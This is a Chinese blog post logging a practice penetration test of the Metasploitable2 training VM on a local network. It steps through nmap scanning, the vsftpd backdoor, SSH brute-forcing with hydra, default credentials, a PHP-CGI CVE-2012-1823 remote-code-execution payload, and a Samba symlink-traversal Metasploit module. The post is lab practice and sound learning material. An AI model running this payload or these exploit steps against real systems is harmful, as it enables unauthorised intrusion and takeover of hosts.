<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Metasploitable2靶机本地练习记录信息搜集靶机ip: 192.168.80.129（位置）  kali下对整个c端扫描 nmap  -sn   192.168.80.0&#x2F;24    (ping扫描)（arp-scan -l)   找到位置ip：192.168.80.129  端口扫描 nmap （-sS) -sT  –min-rate 10000 -p- 192.168.80">
<meta property="og:type" content="article">
<meta property="og:title" content="Metasploitable2靶机本地练习记录">
<meta property="og:url" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/index.html">
<meta property="og:site_name" content="Recyvan">
<meta property="og:description" content="Metasploitable2靶机本地练习记录信息搜集靶机ip: 192.168.80.129（位置）  kali下对整个c端扫描 nmap  -sn   192.168.80.0&#x2F;24    (ping扫描)（arp-scan -l)   找到位置ip：192.168.80.129  端口扫描 nmap （-sS) -sT  –min-rate 10000 -p- 192.168.80">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/1.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/2-16990060476021.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/3.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/4.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/5.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/7.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/8.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/9.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/10.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/11.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/12.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/13.png">
<meta property="og:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/14.png">
<meta property="article:published_time" content="2023-11-04T09:32:31.000Z">
<meta property="article:modified_time" content="2023-11-04T09:37:20.000Z">
<meta property="article:author" content="Recyvan">
<meta property="article:tag" content="CVE,靶机,Metasploitable2">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/1.png">
    
    
      
        
          <link rel="shortcut icon" href="../../../../images/auto.jpg">
        
      
      
        
          <link rel="icon" type="image/png" href="../../../../images/auto.jpg" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="../../../../images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Metasploitable2靶机本地练习记录</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="../../../../css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.1.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="../../../../index.html">首页</a></li><!--
     --><!--
       --><li><a href="../../../../archives/">归档</a></li><!--
     --><!--
       --><li><a href="../../../../about/">关于</a></li><!--
     --><!--
       --><li><a href="../../../../links/">links</a></li><!--
     --><!--
       --><li><a href="https://recyvan.github.io/">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="../../08/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95%E8%AF%BE%E7%A8%8B-%E4%BD%9C%E4%B8%9A-1/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="../../01/%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97-%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86-1/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&text=Metasploitable2靶机本地练习记录"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&title=Metasploitable2靶机本地练习记录"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&is_video=false&description=Metasploitable2靶机本地练习记录"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Metasploitable2靶机本地练习记录&body=Check out this article: http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&title=Metasploitable2靶机本地练习记录"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&title=Metasploitable2靶机本地练习记录"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&title=Metasploitable2靶机本地练习记录"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&title=Metasploitable2靶机本地练习记录"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&name=Metasploitable2靶机本地练习记录&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&t=Metasploitable2靶机本地练习记录"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95"><span class="toc-number">1.</span> <span class="toc-text">Metasploitable2靶机本地练习记录</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="toc-number">1.1.</span> <span class="toc-text">信息搜集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#21%E7%AB%AF%E5%8F%A3%E6%94%BB%E5%87%BB"><span class="toc-number">1.2.</span> <span class="toc-text">21端口攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#22%E7%AB%AF%E5%8F%A3%E6%94%BB%E5%87%BB"><span class="toc-number">1.3.</span> <span class="toc-text">22端口攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#23%E7%AB%AF%E5%8F%A3%E6%94%BB%E5%87%BB"><span class="toc-number">1.4.</span> <span class="toc-text">23端口攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#25%E4%B8%8E53%E7%AB%AF%E5%8F%A3%E6%94%BB%E5%87%BB"><span class="toc-number">1.5.</span> <span class="toc-text">25与53端口攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#80%E7%AB%AF%E5%8F%A3%E6%94%BB%E5%87%BB"><span class="toc-number">1.6.</span> <span class="toc-text">80端口攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#cgi%E6%A8%A1%E5%BC%8F%E4%B8%8B%E7%9A%84%E5%8F%82%E6%95%B0"><span class="toc-number">1.6.0.1.</span> <span class="toc-text">cgi模式下的参数</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#445%E7%AB%AF%E5%8F%A3%E5%88%A9%E7%94%A8"><span class="toc-number">1.7.</span> <span class="toc-text">445端口利用</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Metasploitable2靶机本地练习记录
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Recyvan</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-11-04T09:32:31.000Z" class="dt-published" itemprop="datePublished">2023-11-04</time>
        
        (Updated: <time datetime="2023-11-04T09:37:20.000Z" class="dt-updated" itemprop="dateModified">2023-11-04</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="../../../../categories/%E9%9D%B6%E6%9C%BA/">靶机</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="../../../../tags/CVE-%E9%9D%B6%E6%9C%BA-Metasploitable2/" rel="tag">CVE,靶机,Metasploitable2</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="Metasploitable2靶机本地练习记录"><a href="#Metasploitable2靶机本地练习记录" class="headerlink" title="Metasploitable2靶机本地练习记录"></a>Metasploitable2靶机本地练习记录</h2><h3 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h3><p>靶机ip: 192.168.80.129（位置）</p>
<blockquote>
<p>kali下对整个c端扫描 nmap  -sn   192.168.80.0&#x2F;24    (ping扫描)（arp-scan -l)</p>
</blockquote>
<p><img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/1.png" alt="1"></p>
<p>找到位置ip：192.168.80.129</p>
<blockquote>
<p>端口扫描 nmap （-sS) -sT  –min-rate 10000 -p- 192.168.80.129 -OA  nmapscan&#x2F;ports</p>
<p>获得端口后提取到txt文本 grep open  nmapscan&#x2F;ports.nmap | awk -F  ‘&#x2F;‘  ‘{print  $1}’  | paste -sd ‘,’  </p>
</blockquote>
<p><img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/2-16990060476021.png" alt="2">          </p>
<p>写入变量$ports中方便后续使用</p>
<blockquote>
<p>查看靶机详细信息 nmap -sT -sV -O -p$ports(tab) 192.168.80.129 -oa nmapscan&#x2F;detail</p>
<p>获得各个开放端口的应用信息：</p>
</blockquote>
<p> <img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/3.png" alt="3"></p>
<h3 id="21端口攻击"><a href="#21端口攻击" class="headerlink" title="21端口攻击"></a>21端口攻击</h3><blockquote>
<p>扫描结果返回为ftp 2.3.4版本。google得知为vsftpd笑脸<em>漏洞</em>msf下验证并执行playload（这个有匿名登入的风险，后面会讲到）</p>
</blockquote>
<p> <img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/4.png" alt="4"></p>
<p>找到对应版本后，set参数并run命令</p>
<p><img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/5.png" alt="6"></p>
<p>直接拿到root权限</p>
<h3 id="22端口攻击"><a href="#22端口攻击" class="headerlink" title="22端口攻击"></a>22端口攻击</h3><blockquote>
<p>nmap下sV扫描版本信息为  OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)，msf直接搜索漏洞未果，那么有可能像ftp匿名登录或者弱口令，利用hydra直接爆破</p>
<p>hydra 192.168.206.216 -L user字典 -P  passwd字典 -u IP ssh,由于没得字典，所以利用了其他工具得到账户msfdamin&#x2F;msfadmin ,但是没想到还扫出来多个弱口令，比如ftp的匿名登录</p>
<p>kali下登录ssh <a href="mailto:&#x6d;&#115;&#x66;&#97;&#100;&#x6d;&#x69;&#x6e;&#64;&#x31;&#57;&#x32;&#46;&#x31;&#54;&#x38;&#x2e;&#x38;&#x30;&#46;&#49;&#50;&#57;">&#x6d;&#115;&#x66;&#97;&#100;&#x6d;&#x69;&#x6e;&#64;&#x31;&#57;&#x32;&#46;&#x31;&#54;&#x38;&#x2e;&#x38;&#x30;&#46;&#49;&#50;&#57;</a> 连接成功后拿到shell,但不是root权限，后续步骤或拿去权限（其实sudo -i可root账户）</p>
</blockquote>
<p><img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/7.png" alt="7"></p>
<h3 id="23端口攻击"><a href="#23端口攻击" class="headerlink" title="23端口攻击"></a>23端口攻击</h3><blockquote>
<p>版本信息为telnet服务，同样是弱口令，根据靶机特性，一般所有服务多为同一账户密码。开始是思路为同样可通过22端口攻击的方式复刻出来，账户密码为msfadmin&#x2F;msfadmin。shell下&gt;远程登入即可拿到当前用户的shell。但登入是它直接告诉你了账户密码（-__-）。</p>
</blockquote>
<p><img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/8.png" alt="8"></p>
<h3 id="25与53端口攻击"><a href="#25与53端口攻击" class="headerlink" title="25与53端口攻击"></a>25与53端口攻击</h3><blockquote>
<p>smtp协议多用于邮件传输当中,此处漏洞同样为弱口令,账户密码:msfadmin&#x2F;msfadmin</p>
<p>domain称网域，是由一串用点分隔的名字组成的互联网上某一台计算机或计算机组的名称，用于在数据传输时对计算机的定位标识（有时也指地理位置）目前还不会,以后在更新</p>
</blockquote>
<h3 id="80端口攻击"><a href="#80端口攻击" class="headerlink" title="80端口攻击"></a>80端口攻击</h3><p>打开网站查看:</p>
<p><img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/9.png" alt="9"></p>
<p>目录扫描没有得到可用结果</p>
<p><img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/10.png" alt="10"></p>
<blockquote>
<p>里面自带以下漏洞靶场便不做演示</p>
<p>以下利用的其他漏洞，访问phpinfo.php得到php版本信息为：php为5.24，存在[PHP-CGI远程&gt;代码执行漏洞CVE-2012-1823]</p>
<p>其就是用户请求的querystring（querystring字面上的意思就是查询字符串，一般是对http请求&gt;所带的数据进行解析，这里也是只http请求中所带的数据）被作为了php-cgi的参数，最终导致了&gt;一系列结果。CVE-2012-1823是在php-cgi运行模式下出现的漏洞，其漏洞只出现在以cgi模式运行&gt;的php中</p>
<p>在文件后接**?-s**后会显示出源码,例如</p>
</blockquote>
<p> <img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/11.png" alt="11"></p>
<p>远程rce的poc为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/-d+allow_url_include%<span class="number">3</span>don+-d+auto_prepend_file%<span class="number">3</span>dphp%<span class="number">3</span>a<span class="comment">//input</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">POST:  <span class="meta">&lt;?php</span> <span class="keyword">echo</span> <span class="title function_ invoke__">system</span>(<span class="string">&quot;ls -al&quot;</span>); <span class="meta">?&gt;</span>  </span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/12.png" alt="12"></p>
<h5 id="cgi模式下的参数"><a href="#cgi模式下的参数" class="headerlink" title="cgi模式下的参数"></a>cgi模式下的参数</h5><ul>
<li>-c 指定php.ini文件的位置</li>
<li>n 不要加载php.ini文件</li>
<li>-d 指定配置项</li>
<li>-b 启动fastcgi进程</li>
<li>-s 显示文件源码</li>
<li>-T 执行指定次该文件</li>
<li>-h和-? 显示帮助</li>
</ul>
<h3 id="445端口利用"><a href="#445端口利用" class="headerlink" title="445端口利用"></a>445端口利用</h3><p>该端口利用为CVE-2010-0926。</p>
<p>nmap扫描得到445端口信息为 netbios-ssn Samba smbd 3.X - 4.X 。msf查找相关漏洞，并利用</p>
<p>利用auxiliary&#x2F;admin&#x2F;smb&#x2F;samba_symlink_traversal模块进行攻击</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br><span class="line">Set RHOST 192.168.80.129 </span><br><span class="line">set SMBSHARE tmp 设置SAM可写文件</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p><img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/13.png" alt="13"></p>
<p>利用成功，输入smbclient  &#x2F;&#x2F;192.168.80.129&#x2F;tmp（提示输入密码处，直接回车即可），之后切换rootfs即可利用成功</p>
<p><img src="/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/14.png" alt="14"></p>
<p>6667端口攻击</p>
<p>待续。。。。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="../../../../index.html">首页</a></li>
        
          <li><a href="../../../../archives/">归档</a></li>
        
          <li><a href="../../../../about/">关于</a></li>
        
          <li><a href="../../../../links/">links</a></li>
        
          <li><a href="https://recyvan.github.io/">项目</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95"><span class="toc-number">1.</span> <span class="toc-text">Metasploitable2靶机本地练习记录</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="toc-number">1.1.</span> <span class="toc-text">信息搜集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#21%E7%AB%AF%E5%8F%A3%E6%94%BB%E5%87%BB"><span class="toc-number">1.2.</span> <span class="toc-text">21端口攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#22%E7%AB%AF%E5%8F%A3%E6%94%BB%E5%87%BB"><span class="toc-number">1.3.</span> <span class="toc-text">22端口攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#23%E7%AB%AF%E5%8F%A3%E6%94%BB%E5%87%BB"><span class="toc-number">1.4.</span> <span class="toc-text">23端口攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#25%E4%B8%8E53%E7%AB%AF%E5%8F%A3%E6%94%BB%E5%87%BB"><span class="toc-number">1.5.</span> <span class="toc-text">25与53端口攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#80%E7%AB%AF%E5%8F%A3%E6%94%BB%E5%87%BB"><span class="toc-number">1.6.</span> <span class="toc-text">80端口攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#cgi%E6%A8%A1%E5%BC%8F%E4%B8%8B%E7%9A%84%E5%8F%82%E6%95%B0"><span class="toc-number">1.6.0.1.</span> <span class="toc-text">cgi模式下的参数</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#445%E7%AB%AF%E5%8F%A3%E5%88%A9%E7%94%A8"><span class="toc-number">1.7.</span> <span class="toc-text">445端口利用</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&text=Metasploitable2靶机本地练习记录"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&title=Metasploitable2靶机本地练习记录"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&is_video=false&description=Metasploitable2靶机本地练习记录"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Metasploitable2靶机本地练习记录&body=Check out this article: http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&title=Metasploitable2靶机本地练习记录"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&title=Metasploitable2靶机本地练习记录"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&title=Metasploitable2靶机本地练习记录"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&title=Metasploitable2靶机本地练习记录"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
